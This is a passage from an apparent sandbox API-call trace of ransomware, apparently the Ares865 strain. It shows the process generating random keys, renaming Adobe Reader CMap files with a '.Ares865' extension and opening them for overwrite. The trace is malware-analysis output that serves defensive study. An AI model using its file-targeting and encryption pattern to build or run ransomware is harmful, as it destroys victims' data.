phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.240] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-2" | out: lpString1="Adobe-CNS1-2") returned="Adobe-CNS1-2" [0161.240] lstrlenW (lpString="Adobe-CNS1-2") returned 12 [0161.240] lstrlenW (lpString="Ares865") returned 7 [0161.240] lstrcmpiW (lpString1="-CNS1-2", lpString2="Ares865") returned 1 [0161.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2.Ares865") returned 75 [0161.240] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-2.ares865"), dwFlags=0x1) returned 1 [0161.242] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.242] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4239) returned 1 [0161.243] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.247] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.248] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-3" | out: lpString1="Adobe-CNS1-3") returned="Adobe-CNS1-3" [0161.248] lstrlenW (lpString="Adobe-CNS1-3") returned 12 [0161.248] lstrlenW (lpString="Ares865") returned 7 [0161.248] lstrcmpiW (lpString1="-CNS1-3", lpString2="Ares865") returned 1 [0161.248] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3.Ares865") returned 75 [0161.248] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-3"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-3.ares865"), dwFlags=0x1) returned 1 [0161.250] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.250] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4344) returned 1 [0161.251] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.255] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.256] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-4" | out: lpString1="Adobe-CNS1-4") returned="Adobe-CNS1-4" [0161.256] lstrlenW (lpString="Adobe-CNS1-4") returned 12 [0161.256] lstrlenW (lpString="Ares865") returned 7 [0161.257] lstrcmpiW (lpString1="-CNS1-4", lpString2="Ares865") returned 1 [0161.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4.Ares865") returned 75 [0161.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-4"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-4.ares865"), dwFlags=0x1) returned 1 [0161.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.259] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4365) returned 1 [0161.259] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.263] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-5" | out: lpString1="Adobe-CNS1-5") returned="Adobe-CNS1-5" [0161.263] lstrlenW (lpString="Adobe-CNS1-5") returned 12 [0161.263] lstrlenW (lpString="Ares865") returned 7 [0161.263] lstrcmpiW (lpString1="-CNS1-5", lpString2="Ares865") returned 1 [0161.264] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5.Ares865") returned 75 [0161.264] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-5"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-5.ares865"), dwFlags=0x1) returned 1 [0161.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.265] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4365) returned 1 [0161.266] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.266] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.266] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.273] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.275] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-B5pc" | out: lpString1="Adobe-CNS1-B5pc") returned="Adobe-CNS1-B5pc" [0161.275] lstrlenW (lpString="Adobe-CNS1-B5pc") returned 15 [0161.275] lstrlenW (lpString="Ares865") returned 7 [0161.275] lstrcmpiW (lpString1="S1-B5pc", lpString2="Ares865") returned 1 [0161.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc.Ares865") returned 78 [0161.275] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-b5pc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-b5pc.ares865"), dwFlags=0x1) returned 1 [0161.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-b5pc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7955) returned 1 [0161.278] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.279] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.279] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.283] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.284] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.284] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.284] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-ETen-B5" | out: lpString1="Adobe-CNS1-ETen-B5") returned="Adobe-CNS1-ETen-B5" [0161.284] lstrlenW (lpString="Adobe-CNS1-ETen-B5") returned 18 [0161.284] lstrlenW (lpString="Ares865") returned 7 [0161.284] lstrcmpiW (lpString1="ETen-B5", lpString2="Ares865") returned 1 [0161.285] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5.Ares865") returned 81 [0161.285] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-eten-b5"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-eten-b5.ares865"), dwFlags=0x1) returned 1 [0161.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-eten-b5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.287] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8375) returned 1 [0161.287] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.291] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.292] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-H-CID" | out: lpString1="Adobe-CNS1-H-CID") returned="Adobe-CNS1-H-CID" [0161.292] lstrlenW (lpString="Adobe-CNS1-H-CID") returned 16 [0161.292] lstrlenW (lpString="Ares865") returned 7 [0161.292] lstrcmpiW (lpString1="1-H-CID", lpString2="Ares865") returned -1 [0161.292] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID.Ares865") returned 79 [0161.292] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-cid"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-cid.ares865"), dwFlags=0x1) returned 1 [0161.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-cid.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1973) returned 1 [0161.295] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.295] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.299] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.300] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-H-Host" | out: lpString1="Adobe-CNS1-H-Host") returned="Adobe-CNS1-H-Host" [0161.300] lstrlenW (lpString="Adobe-CNS1-H-Host") returned 17 [0161.300] lstrlenW (lpString="Ares865") returned 7 [0161.301] lstrcmpiW (lpString1="-H-Host", lpString2="Ares865") returned 1 [0161.301] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host.Ares865") returned 80 [0161.301] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-host"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-host.ares865"), dwFlags=0x1) returned 1 [0161.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-host.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.303] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8490) returned 1 [0161.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.307] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.308] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-H-Mac" | out: lpString1="Adobe-CNS1-H-Mac") returned="Adobe-CNS1-H-Mac" [0161.308] lstrlenW (lpString="Adobe-CNS1-H-Mac") returned 16 [0161.308] lstrlenW (lpString="Ares865") returned 7 [0161.308] lstrcmpiW (lpString1="1-H-Mac", lpString2="Ares865") returned -1 [0161.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac.Ares865") returned 79 [0161.308] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-mac"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-mac.ares865"), dwFlags=0x1) returned 1 [0161.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-mac.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8022) returned 1 [0161.313] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.317] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.318] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.318] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.319] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-UCS2" | out: lpString1="Adobe-CNS1-UCS2") returned="Adobe-CNS1-UCS2" [0161.319] lstrlenW (lpString="Adobe-CNS1-UCS2") returned 15 [0161.319] lstrlenW (lpString="Ares865") returned 7 [0161.319] lstrcmpiW (lpString1="S1-UCS2", lpString2="Ares865") returned 1 [0161.319] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2.Ares865") returned 78 [0161.319] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=281794) returned 1 [0161.323] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.348] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.349] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.349] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.353] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-0" | out: lpString1="Adobe-GB1-0") returned="Adobe-GB1-0" [0161.353] lstrlenW (lpString="Adobe-GB1-0") returned 11 [0161.353] lstrlenW (lpString="Ares865") returned 7 [0161.353] lstrcmpiW (lpString1="e-GB1-0", lpString2="Ares865") returned 1 [0161.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0.Ares865") returned 74 [0161.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-0"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-0.ares865"), dwFlags=0x1) returned 1 [0161.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3472) returned 1 [0161.358] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.363] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.364] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.364] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.365] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-1" | out: lpString1="Adobe-GB1-1") returned="Adobe-GB1-1" [0161.365] lstrlenW (lpString="Adobe-GB1-1") returned 11 [0161.365] lstrlenW (lpString="Ares865") returned 7 [0161.365] lstrcmpiW (lpString1="e-GB1-1", lpString2="Ares865") returned 1 [0161.365] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1.Ares865") returned 74 [0161.365] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-1"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-1.ares865"), dwFlags=0x1) returned 1 [0161.367] CreateFileW 